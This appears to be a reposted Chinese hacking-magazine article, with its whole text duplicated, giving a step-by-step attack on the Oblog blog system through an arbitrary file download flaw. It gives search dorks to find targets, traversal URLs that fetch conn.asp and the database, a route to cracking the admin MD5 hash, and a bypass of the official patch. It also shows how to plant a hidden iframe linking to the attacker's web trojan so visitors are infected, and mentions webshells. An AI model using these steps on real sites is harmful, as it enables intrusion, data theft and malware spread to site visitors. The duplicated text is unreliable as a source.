论文部分内容阅读
最近各种网站程序总是漏洞不断,也不知是攻击者们挖洞太厉害,还是网站程序设计者们太粗心。尤其典型的是Oblog博客爆出的一个附件任意文件下载漏洞,导致攻击者可以任意下载网站中的数据库及各种机密信患文件,在短短的几天之内Oblog官方网站就将此漏洞补上了,可打过补丁之后,居然漏洞还存在!——不由让人困惑,漏洞频频,究竟是什么地方出了问题?
第一爆,路径未过滤
Oblog博客是一款国内应用非常广泛的博客系统,连国内许多大型的门户网站所提供的博客服务,都是在Oblog博客的基础上进行更改的。Oblog博客系统程序出现漏洞的话,后果是非常严重的。
菜鸟要提升,需会简单分析
最先爆出的Oblog博客系统漏洞,主要源于Oblog博客系统的附件下载功能,未进行严格的过滤判断,与致攻击者可以提交任意数据字符,突破下载限制。我们先来看看简单的漏洞代码,并作一个简单的分析。
Oblog博客系统的附件下载功能,只要是通过“attachment.asp”程序文件实现的,可从网上下载Oblog源程序。用记事本打开“attachment.asp”文件。在源代码顶部,可以看到如下几句简单的代码:
Path=Trim(Request(“path”))
FilelD=Trim(Request(“FilelD”))
这两句代码,是用于获取下载附件的路径和文件名的。其中只是用Trim函数过滤了文件名和路径中的空格,后的代码中未进行其它过滤操作,因此造成了漏洞的存在。
小测试,抓内鸡
了解了漏洞的简单原理。现在我们就来看看如何利用此漏洞,下载网站的数据库。并进行攻击的。由于此漏洞是存在于“Oblog v4.6 build 20080403”之前的版本中。所以需要先确定博客的版本。
检测站点漏洞
在百度或Google中,以关键字“Copy right byOblog.cn”进行搜索,可找到大量的结果。随便打开一个博客链接,在主页链接后面添加“ver.asp”以查看版本,例如这里的目标网站链接是“http://www.****.com/blog”,那么版本链接就应该是“http://www.****.com/blog/ver.asp”。在打开页面返回信息中,就可以看到当前的Oblog版本。在这里返回的是“4.60 FinalBuild20080103(access)”,因此可以确定该站点满足入侵攻击要求。
下载Conn.asp
首先,在网站注册一个用户名,并登录博客站点。因为下载附件前,首先会检测用户的Cookie信息是否登录。登录后才可以下载附件。登录成功后,转到自己的博客首页,将地址栏中的链接改为“attachment,asp?path=./conn.asp”。这里目标网站链接是“http://www.****.com/blog”,那么就改成“http://www.****.com/blog/attachment.asp?path=./conn.asp”。假如目标网站采用的是一级目录,链接地址形如“http://www.*****.com/”。则链接改为“http://www.****.com/attachment.asp?path=./conn.asp”。一定要注意链接的目录关系,否则可能下载不到文件。
修改链接后,回车提交。可以看到弹出了一个下载对话框。点击“保存”按钮,将“conn,asp”文件保存到本地。用记事本打开。
下载数据库
其实“conn.asp”文件就是Oblog的数据库连接文件。用于设置数据库的路径和打开关闭等配置。打开该文件的事。找到如下代码:
Sub link database()
If Is_Sqldata=O Then
Access数据库连接参数
此处必须为以根目录开始,最前面必须为/号
免费用户初次安装务必修改DATA目录的数据库名称
db=“/data/oblog4.60.asp”
其中的“db”定义的变量,就是路径库的数据地址了,这里为“/data/oblog4.60.asp”。再次在刚才浏览器窗口中。修改链接地址为“http://www.****.com/blog/data/oblog4.60.asp”,如果目标站点为一级目录的话,也作相应的修改。复制该链接到迅雷或网际快车之类的下载工具中,新建一个下载任务,即可下载保存网站的数据库。
如果网数据库作了防下载处理,那么就只有用“http://www.****.com/blog/attachment.asp?path=./data/oblog4.60.asp”链接,在IE中提交后直接进行下载。
破解管理员密码
将下载后的数据库后缀名改为mdb,用Access或其它数据库查看工具打开。找到“oblog admin”表,打开此数据表后,在其中可以看到管理员的用户名及密码。管理员密码是用MD5过密的,因此需要进行破解,可以到一些MD5在线破解站点进行破解,也可以使用本地暴力破解工具解码。具体的方法就不多说,以前讲过很多。
“版权”挂马
用破解的管理员密码登录后台页面“admin/adrain_loqin.asp”,在后台管理页面中,点击左侧的“网站信息配置”栏目。右设置页面中,找到“网站信息配置”→“站点版权信息:”,在设置框中添加一句代码“iframe src=“http://www.baidu.com”width=Oheight=O/iframe”。即可实现在网站挂马。在实际操作过程中。需要将百度的链接改为自己的网页木马地址。至于网页木马的选择,曾介绍过的黑手刃网页木马,威力是非常强大的。相信很快就可以获得大量的肉鸡!
第二爆,漏洞再现
Oblog博客爆出的任意文件下载漏洞,没过几天官方就发布的新的补丁,但是打上补丁后。其实这个漏洞还是存在的!看看集成了新补丁的“attachment.asp”文件,看看与原来的文件有什么不同,发现在其中多出了如下代码:
IflnStr(path,Oblog.CacheConfig(56))>0 Then
downloadFile Server.MapPath(Path),1
该句代码的作用,仅仅是判断用户提交的路径是否包含“UploadFiles”,如果是的话,那么就调用downloadfile函数下载文件。此时。使用前面的方法已经无法进行下载了。但是我们只需要修改一下提交的路径链接,同样还是可以下载的!
例如上面的“http://www.****.com/blog/attachment.asp?path=./conn.asp”链接,可以改为如下:
http://www.****.com/blog/attachment.asp?path=UploadFiles/..../conn.asp.
注意,在上面的链接地址中,最后的asp后有一个“.”。是用于突破对文件格式的限制的。提交链接后。就可以再次成功的下载到数据库连接文件了。
下载数据库后,再按与上面相同的方法,进入后台。在后台可以挂马,也可以直接获取Webshell,具体的方法在这里就不多说了。
第一爆,路径未过滤
Oblog博客是一款国内应用非常广泛的博客系统,连国内许多大型的门户网站所提供的博客服务,都是在Oblog博客的基础上进行更改的。Oblog博客系统程序出现漏洞的话,后果是非常严重的。
菜鸟要提升,需会简单分析
最先爆出的Oblog博客系统漏洞,主要源于Oblog博客系统的附件下载功能,未进行严格的过滤判断,与致攻击者可以提交任意数据字符,突破下载限制。我们先来看看简单的漏洞代码,并作一个简单的分析。
Oblog博客系统的附件下载功能,只要是通过“attachment.asp”程序文件实现的,可从网上下载Oblog源程序。用记事本打开“attachment.asp”文件。在源代码顶部,可以看到如下几句简单的代码:
Path=Trim(Request(“path”))
FilelD=Trim(Request(“FilelD”))
这两句代码,是用于获取下载附件的路径和文件名的。其中只是用Trim函数过滤了文件名和路径中的空格,后的代码中未进行其它过滤操作,因此造成了漏洞的存在。
小测试,抓内鸡
了解了漏洞的简单原理。现在我们就来看看如何利用此漏洞,下载网站的数据库。并进行攻击的。由于此漏洞是存在于“Oblog v4.6 build 20080403”之前的版本中。所以需要先确定博客的版本。
检测站点漏洞
在百度或Google中,以关键字“Copy right byOblog.cn”进行搜索,可找到大量的结果。随便打开一个博客链接,在主页链接后面添加“ver.asp”以查看版本,例如这里的目标网站链接是“http://www.****.com/blog”,那么版本链接就应该是“http://www.****.com/blog/ver.asp”。在打开页面返回信息中,就可以看到当前的Oblog版本。在这里返回的是“4.60 FinalBuild20080103(access)”,因此可以确定该站点满足入侵攻击要求。
下载Conn.asp
首先,在网站注册一个用户名,并登录博客站点。因为下载附件前,首先会检测用户的Cookie信息是否登录。登录后才可以下载附件。登录成功后,转到自己的博客首页,将地址栏中的链接改为“attachment,asp?path=./conn.asp”。这里目标网站链接是“http://www.****.com/blog”,那么就改成“http://www.****.com/blog/attachment.asp?path=./conn.asp”。假如目标网站采用的是一级目录,链接地址形如“http://www.*****.com/”。则链接改为“http://www.****.com/attachment.asp?path=./conn.asp”。一定要注意链接的目录关系,否则可能下载不到文件。
修改链接后,回车提交。可以看到弹出了一个下载对话框。点击“保存”按钮,将“conn,asp”文件保存到本地。用记事本打开。
下载数据库
其实“conn.asp”文件就是Oblog的数据库连接文件。用于设置数据库的路径和打开关闭等配置。打开该文件的事。找到如下代码:
Sub link database()
If Is_Sqldata=O Then
Access数据库连接参数
此处必须为以根目录开始,最前面必须为/号
免费用户初次安装务必修改DATA目录的数据库名称
db=“/data/oblog4.60.asp”
其中的“db”定义的变量,就是路径库的数据地址了,这里为“/data/oblog4.60.asp”。再次在刚才浏览器窗口中。修改链接地址为“http://www.****.com/blog/data/oblog4.60.asp”,如果目标站点为一级目录的话,也作相应的修改。复制该链接到迅雷或网际快车之类的下载工具中,新建一个下载任务,即可下载保存网站的数据库。
如果网数据库作了防下载处理,那么就只有用“http://www.****.com/blog/attachment.asp?path=./data/oblog4.60.asp”链接,在IE中提交后直接进行下载。
破解管理员密码
将下载后的数据库后缀名改为mdb,用Access或其它数据库查看工具打开。找到“oblog admin”表,打开此数据表后,在其中可以看到管理员的用户名及密码。管理员密码是用MD5过密的,因此需要进行破解,可以到一些MD5在线破解站点进行破解,也可以使用本地暴力破解工具解码。具体的方法就不多说,以前讲过很多。
“版权”挂马
用破解的管理员密码登录后台页面“admin/adrain_loqin.asp”,在后台管理页面中,点击左侧的“网站信息配置”栏目。右设置页面中,找到“网站信息配置”→“站点版权信息:”,在设置框中添加一句代码“iframe src=“http://www.baidu.com”width=Oheight=O/iframe”。即可实现在网站挂马。在实际操作过程中。需要将百度的链接改为自己的网页木马地址。至于网页木马的选择,曾介绍过的黑手刃网页木马,威力是非常强大的。相信很快就可以获得大量的肉鸡!
第二爆,漏洞再现
Oblog博客爆出的任意文件下载漏洞,没过几天官方就发布的新的补丁,但是打上补丁后。其实这个漏洞还是存在的!看看集成了新补丁的“attachment.asp”文件,看看与原来的文件有什么不同,发现在其中多出了如下代码:
IflnStr(path,Oblog.CacheConfig(56))>0 Then
downloadFile Server.MapPath(Path),1
该句代码的作用,仅仅是判断用户提交的路径是否包含“UploadFiles”,如果是的话,那么就调用downloadfile函数下载文件。此时。使用前面的方法已经无法进行下载了。但是我们只需要修改一下提交的路径链接,同样还是可以下载的!
例如上面的“http://www.****.com/blog/attachment.asp?path=./conn.asp”链接,可以改为如下:
http://www.****.com/blog/attachment.asp?path=UploadFiles/..../conn.asp.
注意,在上面的链接地址中,最后的asp后有一个“.”。是用于突破对文件格式的限制的。提交链接后。就可以再次成功的下载到数据库连接文件了。
下载数据库后,再按与上面相同的方法,进入后台。在后台可以挂马,也可以直接获取Webshell,具体的方法在这里就不多说了。